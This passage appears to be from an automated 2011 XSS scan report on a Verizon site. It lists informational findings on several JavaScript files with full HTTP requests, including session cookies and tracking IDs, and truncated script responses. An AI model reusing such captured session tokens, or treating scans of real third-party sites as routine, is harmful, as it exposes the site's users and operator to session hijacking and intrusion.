...[SNIP]...

27.11. https://www22.verizon.com/includes/javascript/scb.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/scb.js

Request

GET /includes/javascript/scb.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 4167
Date: Mon, 05 Sep 2011 22:21:57 GMT
Connection: keep-alive

var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* headerlogin.js */

/* ***** GLOBALS ***** */

var DIVOff=-250;
...[SNIP]...

27.12. https://www22.verizon.com/includes/javascript/scb31.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/scb31.js

Request

GET /includes/javascript/scb31.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:43 GMT
Content-Length: 11182
Connection: keep-alive

var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];
var d=document;
if(fnGetFullCookie('scbGreyNav')!=null){var scb1=fnGet
...[SNIP]...

27.13. https://www22.verizon.com/includes/javascript/scb31menu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/scb31menu.js

Request

GET /includes/javascript/scb31menu.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 23324
Date: Mon, 05 Sep 2011 22:21:44 GMT
Connection: keep-alive

var aMenu=new Array();
aMenu[0]='203,0,Home,http://www22.verizon.com,,/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx,/ForYourHome/MyAccount/Protected/Overview/MyOverview.aspx,1,
...[SNIP]...

27.14. https://www22.verizon.com/includes/javascript/scbsearch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/scbsearch.js

Request

GET /includes/javascript/scbsearch.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 10817
Connection: keep-alive

var scbSrcHref=(window.location.href).toLowerCase().substring(0,((window.location.href).toLowerCase().search(/goto=/)>-1)?(window.location.href).toLowerCase().search(/goto=/):999);
var scbSrcqDefau
...[SNIP]...

27.15. https://www22.verizon.com/includes/javascript/sitewise.js/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/sitewise.js/

Request

Response

Report generated by XSS.CX at Mon Sep 05 21:53:59 GMT-06:00 2011.